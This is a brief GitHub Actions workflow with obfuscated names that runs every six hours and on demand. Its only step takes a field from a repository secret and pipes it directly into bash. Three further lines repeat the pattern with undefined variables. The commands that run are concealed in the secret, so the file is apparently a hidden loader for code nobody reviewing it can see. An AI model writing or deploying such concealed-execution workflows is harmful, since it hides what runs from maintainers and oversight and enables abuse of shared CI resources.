name: zhangcongrong6247
on:
  workflow_dispatch:
  schedule:
    - cron: '22 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangcongrong6247
        env:
          auf4: ${{ secrets.auf4 }}
        run: |
          echo $auf4 | jq -r .evrms50308 | /bin/bash
          echo $kdv16665 | jq -r .vb98249 | /bin/bash
          echo $bxv25 | jq -r .plxr5 | /bin/bash
          echo $tswsw91895 | jq -r .ggozs10 | /bin/bash

